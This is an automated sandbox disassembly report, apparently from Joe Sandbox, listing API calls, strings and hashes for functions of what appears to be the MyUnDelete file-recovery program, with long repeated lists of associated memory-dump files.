Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CloseCodeExitHandleKillThreadTimerwsprintf
String ID: Restoring file(s), %d.%d%% complete
API String ID: 1794638729-857039005
Opcode ID: 403bbe68d160e5f59120f3e93b560cc71ecd90e9673202bfb26c1ddee590eadd
Instruction ID: 2dc3671966137be26a13b5c201b9bd0b7145af9afa5723b83360b2b14fa00ebf
Opcode Fuzzy Hash: 403bbe68d160e5f59120f3e93b560cc71ecd90e9673202bfb26c1ddee590eadd
Instruction Fuzzy Hash: 673150B4A002189BD714DF55C888BAAB7B5EF48304F1082EEE52997392DB74AE80CF55

Function 00451200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 0045122E
lstrcpyW.KERNEL32(?,A:\), ref: 00451299

Part of subcall function 00445C40: ~_Task_impl.LIBCPMT ref: 00445C7C

Strings

, xrefs: 0045126E
A:\, xrefs: 00451287

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: DrivesLogicalTask_impllstrcpy
String ID: $A:\
API String ID: 570218870-513786913
Opcode ID: 049eae53dd58bb34979b291eb387a4253e15040e4f8308bdee3b9306f2bcbba2
Instruction ID: e7f00e6bf48eaaf7eaeb8d1b772cf8934f023716f798e560c4218bc46a5cff28
Opcode Fuzzy Hash: 049eae53dd58bb34979b291eb387a4253e15040e4f8308bdee3b9306f2bcbba2
Instruction Fuzzy Hash: 4E314C70900249DBDB24DF54C941BEDB3B0FB04314F1086AAE81ABB392EB356E45DF5A

Function 00446440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040D018: _memset.LIBCMT ref: 0040D034

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00446490
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004464A2

Part of subcall function 00444AC0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00444AEB
Part of subcall function 00444AC0: _Smanip.LIBCPMTD ref: 00444B3E

wsprintfW.USER32 ref: 004464DB

Strings

Select disk to proceed with image '%s', xrefs: 004464CF

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$Smanip_memsetwsprintf
String ID: Select disk to proceed with image '%s'
API String ID: 3567133306-486904798
Opcode ID: e179e77cba3868a0c55bd6a94f5593689822c679133659ba5b3c7c7ad78b09ff
Instruction ID: 9fc11f802820f377ce92800c02a7a6f2e7cbb694fb5f1f153890d791f1e31529
Opcode Fuzzy Hash: e179e77cba3868a0c55bd6a94f5593689822c679133659ba5b3c7c7ad78b09ff
Instruction Fuzzy Hash: 7C115EB0904149ABDB04DF98CC51BAEB7B4FB44308F10866EE522A73C1CB796A04CB99

Function 0044E2A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044E2D8
_memset.LIBCMT ref: 0044E2EB
GetSaveFileNameW.COMDLG32(0000004C), ref: 0044E35D

Part of subcall function 0041375B: IsWindow.USER32(?), ref: 0041376F

Strings

L, xrefs: 0044E2F3

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: _memset$FileNameSaveWindow
String ID: L
API String ID: 4227242722-2909332022
Opcode ID: e6f92024d414c30fd49d38275122d591f78ca7eaa8af913245c28096ec126ff9
Instruction ID: d24360327d32de9656b45ac73a45cfd2dc7c314f771e6ec24824cfc33ac73994
Opcode Fuzzy Hash: e6f92024d414c30fd49d38275122d591f78ca7eaa8af913245c28096ec126ff9
Instruction Fuzzy Hash: 60213EB8D002A8DBDB24DF55DD41AD9B7B5BB08304F0080EAE54C67241E7B85EC8CF69

Function 00456A70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00456AA8
_memset.LIBCMT ref: 00456ABB
GetOpenFileNameW.COMDLG32(0000004C), ref: 00456B2D

Part of subcall function 004564C0: RegCreateKeyW.ADVAPI32(80000001,Software\SeriousBit\MyUnDelete\Images,?), ref: 004564EB
Part of subcall function 004564C0: RegEnumValueW.ADVAPI32(?,?,?,00000800,00000000,?,?,00001000), ref: 00456552
Part of subcall function 004564C0: wsprintfW.USER32 ref: 004565C4
Part of subcall function 004564C0: RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 004565F8
Part of subcall function 004564C0: lstrlenW.KERNEL32(?), ref: 0045661C
Part of subcall function 004564C0: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00456638
Part of subcall function 004564C0: RegCloseKey.ADVAPI32(?), ref: 0045665E

Strings

L, xrefs: 00456AC3

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Value$_memset$CloseCreateEnumFileNameOpenQuerylstrlenwsprintf
String ID: L
API String ID: 95291643-2909332022
Opcode ID: df30f889d458d9b6ce33d502c8cb9bb146a622a32bd15d1da1d80d682d9943d6
Instruction ID: c4266ea9ae315f5f17337c2695d8ad6f221d087ed89d3f5671fcdcfa456a7006
Opcode Fuzzy Hash: df30f889d458d9b6ce33d502c8cb9bb146a622a32bd15d1da1d80d682d9943d6
Instruction Fuzzy Hash: 85214F749002A8DBDB20DF55DD41ADAB7B5BB48304F4080DAD94CA7241DBB85EC8CF59

Function 00432A0F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00432A22

Part of subcall function 0043297D: ___BuildCatchObjectHelper.LIBCMT ref: 004329B3

_UnwindNestedFrames.LIBCMT ref: 00432A39
___FrameUnwindToState.LIBCMT ref: 00432A47

Strings

csm, xrefs: 00432A1E, 00432A33, 00432A46, 00432A64, 00432A74

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 2206318e337d2f3515391cde8e1ee21a3c5083d06a591f46b3cb91d2cf8174d1
Instruction ID: 9319dc84e054eee94643f7918a0dd053dfbbf331007a77cec6d1eb7be8ced61d
Opcode Fuzzy Hash: 2206318e337d2f3515391cde8e1ee21a3c5083d06a591f46b3cb91d2cf8174d1
Instruction Fuzzy Hash: 79012471000109BBDF22AE52CD45EAB7F6AFF18344F008016BD1814161D7BA99A1EBA8

Function 00453240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00453285
PathFileExistsW.SHLWAPI(?,?,?,?), ref: 00453295
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 004532B8
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004532F6
CloseHandle.KERNEL32(?), ref: 00453303

Strings

Mail (%d).eml, xrefs: 00453272

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
